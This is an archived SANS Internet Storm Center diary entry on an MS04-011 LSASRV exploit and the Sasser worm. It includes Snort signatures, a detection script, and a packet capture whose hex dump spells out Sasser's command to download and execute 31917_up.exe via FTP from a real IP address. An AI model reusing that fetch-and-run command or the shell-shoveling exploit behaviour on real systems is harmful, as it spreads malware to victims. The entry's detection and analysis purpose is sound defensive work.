SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2004-05-01 InfoSec Handlers Diary Blog



Updated: MS04-011 LSASRV Exploit; Sasser Worm Update: Sasser.b

Published: 2004-05-01
Last Updated: 2004-05-02 19:37:56 UTC
by Lorna Hutcheson (Version: 1)
Updated: MS04-011 LSASRV Exploit

We received reports late last night from David Tulo of suspicious traffic. After much analysis by many handlers, and with David's help in providing captures and describing what he was seeing (nice analysis job, David), we were able to match the traffic to an exploit against the LSASRV vulnerability in MS04-011. For more information:
http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx


We also observed and captured similar traffic at two other locations. This traffic matches published exploit code against LSASRV. (Thanks to fellow handler Toby Kohlenberg for pointing out the difference between this traffic and the exploit David was seeing.) The exploit is very similar to Sasser and may mislead people about what they are seeing: the destination port observed was 445. However, this exploit lacks the FTP attempts and the communication on ports 5554 and 9996, and no files are dropped on the system. It appears to determine the OS type and then attempt to shovel a shell back to a specific IP address. If that fails, LSASS crashes and the system reboots.

The possibility exists for this to be turned into a worm. No sign of this yet.

It is important to make sure your systems are patched and that you block traffic on port 445 where possible.
Sasser Worm Update

Sasser.b is already confirmed in the wild. This one, however, drops a file called avserv2.exe. Here are two links for more information:

http://www.rav.ro/virus/showvirus.php?v=215

http://vil.nai.com/vil/content/v_125008.htm

Symantec has released its analysis of the Sasser worm and currently classifies it as Level 3 (for both versions). The analysis can be found at

http://securityresponse.symantec.com/avcenter/venc/data/w32.sasser.worm.html

Symantec has also provided a tool for the removal of Sasser and it can be found at:

http://www.sarc.com/avcenter/venc/data/w32.sasser.removal.tool.html


LURHQ ( http://www.lurhq.com ) reports a third version which increases the number of scanning threads to 1024.
The Secunia site provides links to the major vendors and their analyses. They are also listing this as a medium threat right now.
http://secunia.com/virus_information/9142/sasser/

LURHQ has released an analysis of Sasser, which can be found at:
http://www.lurhq.com/sasser.html

Eric Jacobsen wrote the following Snort signatures (updated May 2nd).

The first signature detects the FTP script that Sasser pushes through its backdoor shell on port 9996; |5F75702E657865| is the ASCII string "_up.exe", and flags:A+ requires the ACK bit so the bare SYN does not match:

alert tcp $HOME_NET any -> any 9996 ( msg:"Sasser ftp script to transfer up.exe"; content:"|5F75702E657865|"; depth:250; flags:A+; classtype: misc-activity; sid:1000000; rev:3;)

The second signature will trigger on the actual ftp download on port 5554:

alert tcp any any -> $HOME_NET 5554 ( msg:"Sasser binary transfer get up.exe"; content:"|5F75702E657865|"; depth:250; flags:A+; classtype: misc-activity; sid:1000001; rev:1;)
They are based on this capture of what appears to be Sasser, submitted to the ISC by Eric Conrad:

05/01-12:05:28.458194 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49167 IpLen:20 DgmLen:48 DF

******S* Seq: 0x605F104A Ack: 0x0 Win: 0xFAF0 TcpLen: 28

TCP Options (4) => MSS: 1460 NOP NOP SackOK



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


05/01-12:05:28.498249 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49168 IpLen:20 DgmLen:40 DF

***A**** Seq: 0x605F104B Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


05/01-12:05:28.503069 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49169 IpLen:20 DgmLen:41 DF

***AP*** Seq: 0x605F104B Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20

65 e



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


05/01-12:05:28.644086 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49174 IpLen:20 DgmLen:252 DF

***AP*** Seq: 0x605F104C Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20

63 68 6F 20 6F 66 66 26 65 63 68 6F 20 6F 70 65 cho off&echo ope

6E 20 32 34 2E 39 37 2E 32 31 39 2E 31 38 35 20 n 24.97.219.185

35 35 35 34 3E 3E 63 6D 64 2E 66 74 70 26 65 63 5554>>cmd.ftp&ec

68 6F 20 61 6E 6F 6E 79 6D 6F 75 73 3E 3E 63 6D ho anonymous>>cm

64 2E 66 74 70 26 65 63 68 6F 20 75 73 65 72 26 d.ftp&echo user&

65 63 68 6F 20 62 69 6E 3E 3E 63 6D 64 2E 66 74 echo bin>>cmd.ft

70 26 65 63 68 6F 20 67 65 74 20 33 31 39 31 37 p&echo get 31917

5F 75 70 2E 65 78 65 3E 3E 63 6D 64 2E 66 74 70 _up.exe>>cmd.ftp

26 65 63 68 6F 20 62 79 65 3E 3E 63 6D 64 2E 66 &echo bye>>cmd.f

74 70 26 65 63 68 6F 20 6F 6E 26 66 74 70 20 2D tp&echo on&ftp -

73 3A 63 6D 64 2E 66 74 70 26 33 31 39 31 37 5F s:cmd.ftp&31917_

75 70 2E 65 78 65 26 65 63 68 6F 20 6F 66 66 26 up.exe&echo off&

64 65 6C 20 63 6D 64 2E 66 74 70 26 65 63 68 6F del cmd.ftp&echo

20 6F 6E 0A on.



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


05/01-12:05:29.490393 xxx.xxx.xxx.xxx:1443 ->xxx.xxx.xxx.xxx:9996 TCP TTL:119
TOS:0x0 ID:49184 IpLen:20 DgmLen:40 DF

***A***F Seq: 0x605F1120 Ack: 0xE15F8D72 Win: 0xFAF0 TcpLen: 20


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
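As an added example (not code from the diary, from Eric Jacobsen, or from Snort), here is a small Python re-implementation of the two signatures above run over packets modelled on Eric Conrad's capture, together with a parser that recovers the ftp -s script from the Sasser command line in the hex dump. The 212-byte payload is the capture's hex dump verbatim; everything else is an assumption for the example: $HOME_NET is the RFC 5737 test range 192.0.2.0/24, the header addresses 192.0.2.10 and 198.51.100.7 stand in for the masked xxx.xxx.xxx.xxx ones (ports, flags and sequence numbers follow the capture), and the port 5554 packet is constructed on the assumption that the Windows ftp client sends "get 31917_up.exe" as an FTP "RETR 31917_up.exe" command.

```python
"""Added example, not code from the diary or from Snort: the two rules above
re-implemented as a small packet matcher, plus a parser that recovers the
FTP script from the Sasser command line shown in the capture.

Constructed assumptions: $HOME_NET is 192.0.2.0/24 (RFC 5737 test range);
header addresses are test addresses standing in for the masked xxx ones
(ports, flags and sequence numbers follow the capture); the port 5554
packet assumes the Windows ftp client sends "get X" as "RETR X".
"""
import ipaddress
import re
from dataclasses import dataclass

HOME_NET = ipaddress.ip_network("192.0.2.0/24")   # assumption
SASSER_CONTENT = bytes.fromhex("5F75702E657865")  # |5F75702E657865| == b"_up.exe"
DEPTH = 250                                       # depth:250 in both rules
ACK_INDEX = 3  # Snort prints flags as "12UAPRSF"; flags:A+ = ACK set, rest don't care


@dataclass
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str          # Snort-style flag string, e.g. "***AP***"
    seq: int
    payload: bytes = b""


@dataclass
class Rule:
    sid: int
    msg: str
    dport: int
    home_is_src: bool   # True: $HOME_NET any -> any dport; False: any any -> $HOME_NET dport


RULES = [
    Rule(1000000, "Sasser ftp script to transfer up.exe", 9996, home_is_src=True),
    Rule(1000001, "Sasser binary transfer get up.exe", 5554, home_is_src=False),
]


def rule_matches(rule: Rule, pkt: Packet) -> bool:
    """Destination port, $HOME_NET side, flags:A+, and content within depth:250."""
    if pkt.dport != rule.dport:
        return False
    home_side = pkt.src if rule.home_is_src else pkt.dst
    if ipaddress.ip_address(home_side) not in HOME_NET:
        return False
    if pkt.flags[ACK_INDEX] != "A":
        return False
    # depth:250: the whole pattern must sit inside the first 250 payload bytes
    return SASSER_CONTENT in pkt.payload[:DEPTH]


def scan(packets):
    """(sid, msg) for every packet that fires a rule, in packet order."""
    return [(r.sid, r.msg) for p in packets for r in RULES if rule_matches(r, p)]


def reassemble(packets):
    """Concatenate each flow's payloads in sequence order (the capture split the
    leading 'e' from 'cho off&...'; a per-packet content check can miss such splits)."""
    flows = {}
    for p in packets:
        flows.setdefault((p.src, p.sport, p.dst, p.dport), []).append(p)
    return {k: b"".join(p.payload for p in sorted(v, key=lambda x: x.seq))
            for k, v in flows.items()}


FTP_LINE = re.compile(r"^echo (.*)>>cmd\.ftp$")


def parse_sasser_script(stream: bytes) -> dict:
    """Split the one-liner on '&'; lines echoed into cmd.ftp form the ftp -s script,
    everything that is not an echo is a command the shell actually runs."""
    ftp_script, executed = [], []
    for cmd in stream.decode("ascii", "replace").rstrip("\n").split("&"):
        m = FTP_LINE.match(cmd)
        if m:
            ftp_script.append(m.group(1))
        elif not cmd.startswith("echo "):
            executed.append(cmd)
    info = {"ftp_script": ftp_script, "executed": executed,
            "ftp_host": None, "ftp_port": None, "downloaded": None}
    for line in ftp_script:
        parts = line.split()
        if len(parts) == 3 and parts[0] == "open":
            info["ftp_host"], info["ftp_port"] = parts[1], int(parts[2])
        elif len(parts) == 2 and parts[0] == "get":
            info["downloaded"] = parts[1]
    return info


# 212 payload bytes (DgmLen 252 - 20 IP - 20 TCP), copied from the capture's hex dump
SCRIPT = bytes.fromhex("""
63 68 6F 20 6F 66 66 26 65 63 68 6F 20 6F 70 65  6E 20 32 34 2E 39 37 2E 32 31 39 2E 31 38 35 20
35 35 35 34 3E 3E 63 6D 64 2E 66 74 70 26 65 63  68 6F 20 61 6E 6F 6E 79 6D 6F 75 73 3E 3E 63 6D
64 2E 66 74 70 26 65 63 68 6F 20 75 73 65 72 26  65 63 68 6F 20 62 69 6E 3E 3E 63 6D 64 2E 66 74
70 26 65 63 68 6F 20 67 65 74 20 33 31 39 31 37  5F 75 70 2E 65 78 65 3E 3E 63 6D 64 2E 66 74 70
26 65 63 68 6F 20 62 79 65 3E 3E 63 6D 64 2E 66  74 70 26 65 63 68 6F 20 6F 6E 26 66 74 70 20 2D
73 3A 63 6D 64 2E 66 74 70 26 33 31 39 31 37 5F  75 70 2E 65 78 65 26 65 63 68 6F 20 6F 66 66 26
64 65 6C 20 63 6D 64 2E 66 74 70 26 65 63 68 6F  20 6F 6E 0A
""")

INFECTED, VICTIM = "192.0.2.10", "198.51.100.7"   # constructed test addresses
CAPTURE = [
    Packet(INFECTED, 1443, VICTIM, 9996, "******S*", 0x605F104A),        # SYN: no ACK, cannot match
    Packet(INFECTED, 1443, VICTIM, 9996, "***A****", 0x605F104B),
    Packet(INFECTED, 1443, VICTIM, 9996, "***AP***", 0x605F104B, b"e"),  # the DgmLen 41 segment
    Packet(INFECTED, 1443, VICTIM, 9996, "***AP***", 0x605F104C, SCRIPT),
    Packet(INFECTED, 1443, VICTIM, 9996, "***A***F", 0x605F1120),
    # constructed: the victim fetching the file from the infected host's FTP server on 5554
    # (the script names 24.97.219.185; the test address stands in for it here)
    Packet(VICTIM, 1025, INFECTED, 5554, "***AP***", 0x1000, b"RETR 31917_up.exe\r\n"),
]

if __name__ == "__main__":
    for sid, msg in scan(CAPTURE):
        print(f"[{sid}] {msg}")
    flow = reassemble(CAPTURE)[(INFECTED, 1443, VICTIM, 9996)]
    print(parse_sasser_script(flow))
```

Running it, only the 212-byte segment fires sid 1000000 and the constructed RETR packet fires sid 1000001: the SYN fails flags:A+, and the one-byte "e" segment and the FIN carry no "_up.exe". The parser shows what the one-liner actually does: it echoes "open 24.97.219.185 5554", "anonymous", "bin", "get 31917_up.exe" and "bye" into cmd.ftp, runs ftp -s:cmd.ftp, executes 31917_up.exe and deletes cmd.ftp (note that "echo user" in the capture is not redirected into cmd.ftp, so no password line is written). The caveat the depth keyword brings is visible in reassemble(): the capture happened to deliver the whole script in one segment, but if "_up.exe" landed past byte 250 of a segment a per-packet check would miss it, which is why the content match belongs on the reassembled stream in production (Snort's stream reassembly does this for you).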


Lorna Hutcheson

http://www.iss-md.com

Handler on Duty